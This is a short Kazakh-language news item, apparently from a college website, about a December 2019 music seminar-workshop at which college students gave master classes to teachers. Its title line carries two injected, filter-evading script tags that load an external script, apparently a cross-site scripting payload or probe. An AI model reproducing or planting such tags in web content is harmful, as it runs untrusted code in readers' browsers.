Музыка пәні бойынша семинар-практикум<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.12.2019

 

2019 жылдың желтоқсан айында Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжі оқытушыларының Көкшетау қаласы физика-математикалық бағыттағы Н.Назарбаев Зияткерлік мектебінің музыка пәнінің мұғалімдерімен біріккен семинар-практикумы өтті.  

Колледж тарапынан «Музыка» бөлімінің 4 курс студенттері Күрес Арай, Мұхаммед Нұргүл «Музыка және сәулет өнері» тақырыбында, Тілеубек Ляйла, Темірхан Айшуақ, Раева Мадина «Топтарға бөлу және ырғақтық импровизация жасау әдістері» тақырыбында шеберлік сабақтарын өткізді. Семинар-практикумның мақсаты: музыкалық  білім  берудің мемлекеттік  жалпыға  міндетті стандарт  талаптарына сәйкес  инновациялық  әдіс-тәсілдерді  қолдану арқылы   педагоги­калық шеберліктерін  арттыру, озық тәжірибелерімен бөлісу.

Мектеп оқушылары мен колледж студенттері үшін танымды, оқытушылар үшін тәжірибе алмасарлықтай тың дүниелер ортаға салынды, семинар-практикумның жоғары деңгейде ұйымдастырылғаны байқалды.

 

Просмотров: 1085


Пікір қосу



Деректерді қолтаңбаға қосу